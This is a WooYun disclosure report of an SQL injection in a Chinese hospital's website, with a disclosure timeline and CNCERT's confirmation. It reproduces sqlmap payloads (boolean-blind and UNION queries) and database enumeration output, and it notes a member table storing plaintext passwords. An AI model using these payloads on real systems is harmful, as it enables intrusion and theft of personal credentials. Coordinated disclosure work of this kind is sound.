当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154662

漏洞标题:安徽中医药大学第二附属医院主页存在SQL注入漏洞

相关厂商:安徽中医药大学第二附属医院

漏洞作者: 路人甲

提交时间:2015-11-23 22:16

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

安徽中医药大学第二附属医院官网存在SQL注入漏洞

详细说明:

注入点:
http://**.**.**.**/include/web_content.php?id=727

sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=727 AND 4209=4209
    Type: UNION query
    Title: MySQL UNION query (41) - 21 columns
    Payload: id=-8924 UNION ALL SELECT 41,41,41,41,41,CONCAT(0x71626a7071,0x646b5a53784166556376,0x71706a7171),41,41,41,41,41,41,41,41,41,41,41,41,41,41,41#
---
web server operating system: Linux CentOS
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=727 AND 4209=4209
    Type: UNION query
    Title: MySQL UNION query (41) - 21 columns
    Payload: id=-8924 UNION ALL SELECT 41,41,41,41,41,CONCAT(0x71626a7071,0x646b5a53784166556376,0x71706a7171),41,41,41,41,41,41,41,41,41,41,41,41,41,41,41#
---
web server operating system: Linux CentOS
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [3]:
[*] information_schema
[*] test
[*] user_ahz_ahzjyy
Database: user_ahz_ahzjyy
[58 tables]
+-------------------+
| web_ads           |
| web_ads_ty        |
| web_author        |
| web_bbs           |
| web_bbs_ty        |
| web_bmxx          |
| web_bmxx_counter  |
| web_bmxx_ty       |
| web_branch        |
| web_coll          |
| web_coll_guest    |
| web_coll_ty       |
| web_content       |
| web_content_ty    |
| web_down          |
| web_down_ty       |
| web_guestbook     |
| web_hack          |
| web_hack_ty       |
| web_impart        |
| web_infomation    |
| web_infomation_ty |
| web_inter         |
| web_inter_ty      |
| web_lead          |
| web_lead_info     |
| web_lead_mail     |
| web_lead_ty       |
| web_link          |
| web_link_ty       |
| web_live          |
| web_live_link     |
| web_live_memoir   |
| web_live_pic      |
| web_log           |
| web_menu          |
| web_server        |
| web_server_down   |
| web_server_info   |
| web_server_ty     |
| web_service_bs    |
| web_service_ty    |
| web_source        |
| web_title         |
| web_topic         |
| web_topic_info    |
| web_topic_ty      |
| web_user          |
| web_user_priv     |
| web_visit         |
| web_vod           |
| web_vod_ty        |
| web_vote          |
| web_vote_item     |
| web_vote_log      |
| web_vote_txt      |
| web_vote_ty       |
| web_zchy          |
+-------------------+


会员表

Database: user_ahz_ahzjyy
+----------+---------+
| Table    | Entries |
+----------+---------+
| web_zchy | 533     |
+----------+---------+
Table: web_zchy
[11 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| id         | int(10) unsigned |
| isshow     | char(1)          |
| sendbranch | int(11)          |
| user_dw    | varchar(100)     |
| user_email | varchar(100)     |
| user_name  | varchar(20)      |
| user_pwd   | varchar(100)     |
| user_qq    | int(20)          |
| user_sf    | varchar(100)     |
| user_zwjs  | text             |
| zs_name    | varchar(20)      |
+------------+------------------+


密码是明文存储的

5.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-27 15:07

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。

最新状态:

暂无